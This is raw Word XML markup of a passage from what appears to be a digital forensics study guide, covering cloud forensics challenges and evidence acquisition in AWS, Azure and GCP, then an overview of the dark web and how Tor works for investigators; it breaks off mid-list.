      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the email is genuine and passes all checks, but sent by an attacker (the hardest case).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common tools: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MxToolbox Header Analyzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Google Admin Toolbox, Autopsy’s email parser, FTK, and text editors for raw headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7 Cloud Forensics — Challenges and Conceptual Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud forensics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is digital forensics in cloud computing environments (AWS, Azure, Google Cloud, SaaS apps like Microsoft 365 and Google Workspace). It is harder than traditional forensics because the investigator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">does not own or physically control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared responsibility model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The cloud provider and the customer share security duties — and also forensic duties. The provider secures the underlying infrastructure; the customer secures what they put on it. This decides </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">who holds which evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserv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2534"/>
        <w:gridCol w:w="2534"/>
        <w:gridCol w:w="2534"/>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253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IaaS (e.g. EC2, Azure VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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PaaS (e.g. App Service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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SaaS (e.g. Microsoft 365)</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Physical servers, network</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Hypervisor / host OS</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Guest OS, patches, disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Customer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (full disk and memory access possible)</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Application, data, identities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Customer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Customer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Customer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (data and accounts only)</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Forensic access</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Disk snapshots, memory, OS logs, cloud logs</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Application logs and cloud logs only</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 audit and activity logs only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Main challenges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Challenge</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Explanation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Jurisdiction and law</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may be stored in other countries under different laws. Getting it can need international requests (e.g. MLAT) and takes a long time.</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No physical access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You cannot seize a disk or use a write blocker; you depend on the provider’s tools and APIs.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Multi-tenancy</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Many customers share the same hardware — collecting data must not expose other customers’ data.</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Volatile, elastic systems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Virtual machines and containers can be created and deleted in minutes; evidence may vanish when an instance is terminated.</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Log availability and retention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Logs may be off by default or kept only for a short period; some logs are not available to the customer.</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Dependence on provider</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Provider policy, cooperation and response time matter; the chain of custody involves a third party.</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Time synchronisation and identity</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Different services use different time zones and identity systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence acquisition at a conceptual level</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559"/>
        <w:gridCol w:w="2729"/>
        <w:gridCol w:w="3314"/>
        <w:gridCol w:w="2144"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Disk / VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Logs and activity</w:t>
            </w:r>
          </w:p>
        </w:tc>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Network</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AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Create an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">EBS snapshot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; mount a copy in an isolated forensic instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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CloudTrail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (API/management actions), S3 access logs, CloudWatch logs, GuardDuty findings</w:t>
            </w:r>
          </w:p>
        </w:tc>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VPC Flow Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Take a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">managed disk snapshot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Azure Activity Log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, Microsoft Entra ID sign-in/audit logs, Microsoft 365 unified audit log</w:t>
            </w:r>
          </w:p>
        </w:tc>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NSG flow logs</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GCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Take a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">persistent disk snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Cloud Audit Logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Admin Activity / Data Access), Cloud Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>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VPC Flow Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Preserve first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — snapshot disks and export logs before anything is terminated; enable or extend log retention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — isolate the instance with a security group rule or network rule rather than deleting it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Collect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — logs, snapshots, configuration and identity records; capture memory if the instance is live and tooling allows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — hash exported files and snapshots; document who did what and when, including API calls made by the investigators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a separate, trusted forensic environment, not in the compromised account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Coordinate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the provider and legal team for data not available to the customer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.8 Dark Web — Overview and Challenges for Investigators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Surface, deep and dark web</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4873"/>
        <w:gridCol w:w="2924"/>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Surface web</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Indexed by search engines; open to anyone</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News sites, Wikipedia</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Deep web</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Not indexed — behind logins or paywalls. Mostly legal and ordinary.</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Email inbox, online banking, intranets, cloud drives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Dark web</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small part of the deep web that needs special software (such as Tor) and uses overlay networks to hide identities and locations</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Sites ending in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.onion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The dark web is not illegal in itself — it is used by journalists, activists and privacy-conscious people. But it is also used for illegal markets (drugs, stolen data, weapons), ransomware leak sites, hacking forums, and exploitation material.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How Tor works (idea)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tor (The Onion Router)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends traffic through at least three volunteer servers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">relays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">): entry (guard), middle and exit. The data is wrapped in layers of encryption like an onion, and each relay can remove only one layer. So the entry relay knows who you are but not where you are going; the exit relay knows the destination but not who you are. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (.onion) hide the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">server’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> location too, so both sides are anonymous.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Tor circuit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rPr>
          <w:cantSplit/>
        </w:trPr>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User</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Entry relay (guard)</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Middle relay</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Exit relay</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Website / hidden service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenges for investigators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Anonymity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — IP addresses and server locations are hidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-lived sites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — marketplaces move, disappear or exit-scam; evidence may vanish quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
